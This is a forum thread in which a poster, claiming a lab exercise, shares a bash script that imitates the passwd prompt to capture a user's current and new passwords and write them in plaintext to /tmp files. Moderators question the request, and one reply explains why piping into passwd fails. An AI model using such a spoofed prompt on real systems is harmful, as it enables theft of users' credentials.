How to change password using a script file and text file?

hayloiuy · 06-26-2011, 11:01 AM

Ok please don't judge me or anything. This is for educational purpose. In fact it is my lab tutorial for a subject.

I want to capture the users password when he changes his password. Both new and old.

This is the script i have come up with:

Code:

#!/bin/bash
echo "Changing password for user $USER."
echo "(current) UNIX password: "

read hacked

newpass=0
confpass=1
while [ $newpass != $confpass ] 
do
echo "Enter new UNIX password: "
read newpass

echo "Retype new UNIX password: "
read confpass

done

echo $hacked > /tmp/stolen
echo $newpass > /tmp/newstolen


echo $hacked > /tmp/compilestolen
echo $newpass >> /tmp/compilestolen
echo $newpass >> /tmp/compilestolen


#[method 1] echo $hacked $newpass $confpass | passwd

#[method 2] passwd < /tmp/compilestolen.txt

Both method 1 and method 2 doesn't work. It gives the "Authentication token manipulation header" error in the terminal. Why?

chrism01 · 06-26-2011, 07:20 PM

You may possibly be breaking one of the LQ rules

Quote:

Posts containing information about cracking, piracy, warez, fraud or any topic that could be damaging to either LinuxQuestions.org or any third party will be immediately removed.

OTOH, if this is actually a homework lab it may(?) be ok.
Think I'm going to ask the Mods..

Tinkster · 06-26-2011, 07:31 PM

To the OP: I'd like to see clarification on the background of
this exercise/ hear from you what the justified objective might
be. Until such time as you provided this I ask our members to
refrain from responding to this thread (wonder how many will
actually read this rather than barging in w/ an answer).

Thanks chrism for the notification.

Cheers,
Tink

hayloiuy · 06-26-2011, 10:39 PM

Clarification like my tutorial doc file?

Tinkster · 06-27-2011, 12:55 AM

If the tutorial is available on-line, by all means, yes,
that would certainly help.

Cheers,
Tink

theNbomr · 06-27-2011, 02:13 AM

I'll jump in and answer this, but it isn't going to help anyone subvert the password machinery. What you must have realized before you embarked on this little journey is that someone before you might have thought of your scheme, and of course you're right. The people who wrote the passwd tool were also smart enough to predict that there would be people like you, and made the tool so it does not read its input using standard IO, or at least did it in such a way that it requires actual keystrokes to enter the data. As such, it isn't subject to the perils of covert redirection, such as you've tried here. My hunch is that learning that might just be the point of the lesson.

--- rod.